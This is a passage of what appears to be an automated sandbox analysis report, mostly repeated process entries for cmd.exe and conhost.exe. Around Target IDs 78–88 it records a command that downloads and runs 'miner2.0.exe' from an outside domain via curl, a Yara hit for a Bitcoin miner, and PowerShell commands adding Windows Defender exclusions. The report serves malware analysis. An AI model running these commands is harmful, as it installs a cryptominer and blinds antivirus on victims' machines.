                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:51
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:52
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:53
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:54
                                                                                                                                                                Start time:11:42:21
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:55
                                                                                                                                                                Start time:11:42:21
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:56
                                                                                                                                                                Start time:11:42:21
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:57
                                                                                                                                                                Start time:11:42:21
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:58
                                                                                                                                                                Start time:11:42:22
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:59
                                                                                                                                                                Start time:11:42:22
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:60
                                                                                                                                                                Start time:11:42:23
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:61
                                                                                                                                                                Start time:11:42:23
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:62
                                                                                                                                                                Start time:11:42:25
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:63
                                                                                                                                                                Start time:11:42:25
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:64
                                                                                                                                                                Start time:11:42:25
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:65
                                                                                                                                                                Start time:11:42:25
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:66
                                                                                                                                                                Start time:11:42:27
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:67
                                                                                                                                                                Start time:11:42:27
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:68
                                                                                                                                                                Start time:11:42:27
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:69
                                                                                                                                                                Start time:11:42:27
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:70
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:71
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:72
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:73
                                                                                                                                                                Start time:11:42:28
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:74
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:75
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:76
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:77
                                                                                                                                                                Start time:11:42:29
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:78
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:79
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:80
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:81
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:82
                                                                                                                                                                Start time:11:42:31
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\curl.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                                                                                                                                                                Imagebase:0x7ff646080000
                                                                                                                                                                File size:530'944 bytes
                                                                                                                                                                MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:83
                                                                                                                                                                Start time:11:42:32
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:84
                                                                                                                                                                Start time:11:42:32
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:85
                                                                                                                                                                Start time:11:42:32
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\miner2.0.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:miner2.0.exe
                                                                                                                                                                Imagebase:0x20000
                                                                                                                                                                File size:45'056 bytes
                                                                                                                                                                MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:86
                                                                                                                                                                Start time:11:42:33
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:87
                                                                                                                                                                Start time:11:42:33
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:88
                                                                                                                                                                Start time:11:42:33
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:89
                                                                                                                                                                Start time:11:42:34
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:90
                                                                                                                                                                Start time:11:42:33
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:91
                                                                                                                                                                Start time:11:42:34
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:92
                                                                                                                                                                Start time:11:42:34
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:93
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

